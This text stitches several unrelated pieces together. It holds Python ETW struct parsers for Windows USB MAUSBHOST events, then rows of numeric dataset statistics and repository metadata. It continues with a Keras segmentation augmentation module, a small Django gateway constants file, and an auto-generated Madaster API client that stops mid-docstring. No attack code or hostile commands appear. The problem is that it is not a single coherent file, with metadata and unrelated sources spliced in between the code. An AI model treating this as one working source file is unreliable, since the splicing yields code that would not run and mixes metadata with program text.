"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=214, version=0)
class Microsoft_Windows_USB_MAUSBHOST_214_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpHandlesWithError" / Int8ul,
"fid_EndpointHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=215, version=0)
class Microsoft_Windows_USB_MAUSBHOST_215_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpHandlesToDelete" / Int8ul,
"fid_EndpointHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=216, version=0)
class Microsoft_Windows_USB_MAUSBHOST_216_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpHandlesWithError" / Int8ul,
"fid_EndpointHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=217, version=0)
class Microsoft_Windows_USB_MAUSBHOST_217_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEPHandlesWithError" / Int8ul,
"fid_EPHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=218, version=0)
class Microsoft_Windows_USB_MAUSBHOST_218_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=219, version=0)
class Microsoft_Windows_USB_MAUSBHOST_219_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=220, version=0)
class Microsoft_Windows_USB_MAUSBHOST_220_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEPResetInformationBlocks" / Int8ul,
"fid_EPHandle" / Int16ul,
"fid_TransferStatePreserve" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=221, version=0)
class Microsoft_Windows_USB_MAUSBHOST_221_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=222, version=0)
class Microsoft_Windows_USB_MAUSBHOST_222_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=223, version=0)
class Microsoft_Windows_USB_MAUSBHOST_223_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_UsbDeviceAddress" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=224, version=0)
class Microsoft_Windows_USB_MAUSBHOST_224_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpDescriptors" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=225, version=0)
class Microsoft_Windows_USB_MAUSBHOST_225_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEndpoints" / Int16ul,
"fid_NumberOfDevices" / Int8ul,
"fid_NumberOfStreams" / Int8ul,
"fid_DeviceType" / Int8ul,
"fid_DescriptorCount" / Int8ul,
"fid_DescriptorLength" / Int32ul,
"fid_MaxOutstandingTransferRequests" / Int16ul,
"fid_MaxOutstandingManagementRequests" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=226, version=0)
class Microsoft_Windows_USB_MAUSBHOST_226_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=227, version=0)
class Microsoft_Windows_USB_MAUSBHOST_227_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpHandlesWithError" / Int8ul,
"fid_EndpointHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=228, version=0)
class Microsoft_Windows_USB_MAUSBHOST_228_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=229, version=0)
class Microsoft_Windows_USB_MAUSBHOST_229_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_EP0Handle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=230, version=0)
class Microsoft_Windows_USB_MAUSBHOST_230_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpDescriptors" / Int8ul,
"fid_SizeOfEPDescriptor" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=231, version=0)
class Microsoft_Windows_USB_MAUSBHOST_231_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpHandlesToActivate" / Int8ul,
"fid_EndpointHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=232, version=0)
class Microsoft_Windows_USB_MAUSBHOST_232_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=233, version=0)
class Microsoft_Windows_USB_MAUSBHOST_233_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
| 34.411803
| 123
| 0.664267
| 5,239
| 53,063
| 6.423745
| 0.055163
| 0.096809
| 0.059844
| 0.088192
| 0.945148
| 0.94384
| 0.942771
| 0.812504
| 0.800351
| 0.800351
| 0
| 0.098835
| 0.225279
| 53,063
| 1,541
| 124
| 34.434134
| 0.719818
| 0.001847
| 0
| 0.716226
| 0
| 0
| 0.374443
| 0.203433
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003019
| 0
| 0.161509
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
287fcda2f713c086c51a5f2ed7352dbbd706cf82
| 1,646
|
py
|
Python
|
src/cr/vision/dl/aug/sgmt.py
|
indigits/indigits-vision
|
317fbf70c558e8f9563c3d0ba3bebbc5f84af622
|
[
"Apache-2.0"
] | 2
|
2021-11-02T10:09:47.000Z
|
2021-12-10T04:23:14.000Z
|
src/cr/vision/dl/aug/sgmt.py
|
indigits/indigits-vision
|
317fbf70c558e8f9563c3d0ba3bebbc5f84af622
|
[
"Apache-2.0"
] | null | null | null |
src/cr/vision/dl/aug/sgmt.py
|
indigits/indigits-vision
|
317fbf70c558e8f9563c3d0ba3bebbc5f84af622
|
[
"Apache-2.0"
] | null | null | null |
"""
Augmentation functions for image segmentation tasks
"""
from tensorflow.keras.preprocessing.image import ImageDataGenerator
def augment_train_2d(images, masks,
batch_size=32,
seed=0,
args=dict(
rotation_range=10.0,
height_shift_range=0.02,
shear_range=5,
horizontal_flip=True,
vertical_flip=False,
fill_mode="constant"
)):
image_datagen = ImageDataGenerator(**args)
mask_datagen = ImageDataGenerator(**args)
image_datagen.fit(images, augment=True, seed=seed)
mask_datagen.fit(masks, augment=True, seed=seed)
augmented_images = image_datagen.flow(
images, batch_size=batch_size, shuffle=True, seed=seed)
augmented_masks = mask_datagen.flow(
masks, batch_size=batch_size, shuffle=True, seed=seed)
generator = zip(augmented_images, augmented_masks)
return generator
def augment_test_2d(images, masks,
batch_size=32,
seed=0,
args=dict(
rotation_range=10.0,
height_shift_range=0.02,
shear_range=5,
horizontal_flip=True,
vertical_flip=False,
fill_mode="constant"
)):
image_datagen = ImageDataGenerator(**args)
mask_datagen = ImageDataGenerator(**args)
image_datagen.fit(images, augment=False, seed=seed)
mask_datagen.fit(masks, augment=False, seed=seed)
augmented_images = image_datagen.flow(
images, batch_size=batch_size, shuffle=True, seed=seed)
augmented_masks = mask_datagen.flow(
masks, batch_size=batch_size, shuffle=True, seed=seed)
generator = zip(augmented_images, augmented_masks)
return generator
| 32.92
| 67
| 0.696233
| 201
| 1,646
| 5.462687
| 0.253731
| 0.081967
| 0.065574
| 0.065574
| 0.859745
| 0.859745
| 0.859745
| 0.797814
| 0.797814
| 0.797814
| 0
| 0.016858
| 0.207169
| 1,646
| 49
| 68
| 33.591837
| 0.824521
| 0.030984
| 0
| 0.837209
| 0
| 0
| 0.010082
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0
| 0.023256
| 0
| 0.116279
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
953d535574578989851c194699049aeb3db5a5d0
| 180
|
py
|
Python
|
donations/payment_gateways/_2c2p/constants.py
|
diffractive/newstream
|
cf1a1f230e18d01c63b50ab9d360aa44ac5a486f
|
[
"MIT"
] | 1
|
2020-05-03T12:33:42.000Z
|
2020-05-03T12:33:42.000Z
|
donations/payment_gateways/_2c2p/constants.py
|
diffractive/newstream
|
cf1a1f230e18d01c63b50ab9d360aa44ac5a486f
|
[
"MIT"
] | 14
|
2020-07-06T20:05:57.000Z
|
2022-03-12T00:39:11.000Z
|
donations/payment_gateways/_2c2p/constants.py
|
diffractive/newstream
|
cf1a1f230e18d01c63b50ab9d360aa44ac5a486f
|
[
"MIT"
] | null | null | null |
from site_settings.models import GATEWAY_CAN_EDIT_SUBSCRIPTION, GATEWAY_CAN_CANCEL_SUBSCRIPTION
API_CAPABILITIES = [GATEWAY_CAN_EDIT_SUBSCRIPTION, GATEWAY_CAN_CANCEL_SUBSCRIPTION]
| 60
| 95
| 0.916667
| 23
| 180
| 6.565217
| 0.521739
| 0.264901
| 0.18543
| 0.344371
| 0.715232
| 0.715232
| 0.715232
| 0.715232
| 0
| 0
| 0
| 0
| 0.05
| 180
| 3
| 96
| 60
| 0.883041
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
95ab9f0657f51d6270a63487802c65cb0dfef3d6
| 33,335
|
py
|
Python
|
python3/madasterapi/api/building_file_element_api.py
|
Madaster/examples
|
bd2e8e464172e0d47cac8ed1672501a24ba624c3
|
[
"MIT"
] | 2
|
2021-04-13T12:19:26.000Z
|
2021-09-13T15:40:44.000Z
|
python3/madasterapi/api/building_file_element_api.py
|
Madaster/examples
|
bd2e8e464172e0d47cac8ed1672501a24ba624c3
|
[
"MIT"
] | null | null | null |
python3/madasterapi/api/building_file_element_api.py
|
Madaster/examples
|
bd2e8e464172e0d47cac8ed1672501a24ba624c3
|
[
"MIT"
] | null | null | null |
"""
Madaster Private API - Build: 8815
Welcome to the **Madaster Private API** endpoint. This endpoint can be used to interact with the Madaster Platform and its resources. This API does not fully cover all functionality of the platform yet, please see below for the available functions and what they can be used for. For detailed information about the platform and this API, please refer to the [Madaster Documentation](https://docs.madaster.com) or the [Madaster API Documentation](https://docs.madaster.com/api).<br/><br/>To access these resources, you need an authorization token. If you do not have one yet, see the chapter about Authorization in the [API documentation](https://docs.madaster.com/api). This token should be sent as a header with the name 'X-API-Key', which will authenticate the request with the token. The documentation below specifies which requests are available and which responses they might produce.<br/><br/>This API can be reached at the endpoint: **[https://api.madaster.com/](https://api.madaster.com/)** # noqa: E501
The version of the OpenAPI document: v3.0
Contact: service@madaster.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from madasterapi.api_client import ApiClient, Endpoint as _Endpoint
from madasterapi.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from madasterapi.model.building_file_element_request import BuildingFileElementRequest
from madasterapi.model.building_file_element_response import BuildingFileElementResponse
from madasterapi.model.element_batch_result import ElementBatchResult
class BuildingFileElementApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __building_file_element_add_element(
self,
building_id,
file_id,
**kwargs
):
"""Create a new building file element # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.building_file_element_add_element(building_id, file_id, async_req=True)
>>> result = thread.get()
Args:
building_id (str): The building identifier
file_id (str): The file identifier
Keyword Args:
building_file_element_request (BuildingFileElementRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BuildingFileElementResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['building_id'] = \
building_id
kwargs['file_id'] = \
file_id
return self.call_with_http_info(**kwargs)
self.building_file_element_add_element = _Endpoint(
settings={
'response_type': (BuildingFileElementResponse,),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/api/v3.0/building/{buildingId}/files/{fileId}/elements',
'operation_id': 'building_file_element_add_element',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'building_id',
'file_id',
'building_file_element_request',
],
'required': [
'building_id',
'file_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'building_id':
(str,),
'file_id':
(str,),
'building_file_element_request':
(BuildingFileElementRequest,),
},
'attribute_map': {
'building_id': 'buildingId',
'file_id': 'fileId',
},
'location_map': {
'building_id': 'path',
'file_id': 'path',
'building_file_element_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'text/json',
'application/*+json'
]
},
api_client=api_client,
callable=__building_file_element_add_element
)
def __building_file_element_delete_element(
self,
building_id,
file_id,
id,
**kwargs
):
"""Deletes an existing building file element # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.building_file_element_delete_element(building_id, file_id, id, async_req=True)
>>> result = thread.get()
Args:
building_id (str): The building identifier
file_id (str): The file identifier
id (str, none_type): The element identifier
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['building_id'] = \
building_id
kwargs['file_id'] = \
file_id
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.building_file_element_delete_element = _Endpoint(
settings={
'response_type': None,
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/api/v3.0/building/{buildingId}/files/{fileId}/elements/{id}',
'operation_id': 'building_file_element_delete_element',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'building_id',
'file_id',
'id',
],
'required': [
'building_id',
'file_id',
'id',
],
'nullable': [
'id',
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'building_id':
(str,),
'file_id':
(str,),
'id':
(str, none_type,),
},
'attribute_map': {
'building_id': 'buildingId',
'file_id': 'fileId',
'id': 'id',
},
'location_map': {
'building_id': 'path',
'file_id': 'path',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [],
},
api_client=api_client,
callable=__building_file_element_delete_element
)
def __building_file_element_get_element_by_id(
self,
building_id,
file_id,
id,
**kwargs
):
"""Gets a building file element # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.building_file_element_get_element_by_id(building_id, file_id, id, async_req=True)
>>> result = thread.get()
Args:
building_id (str): The building identifier
file_id (str): The file identifier
id (str, none_type): The element identifier
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BuildingFileElementResponse
If the method is called asynchronously, returns the request
thread.
"""
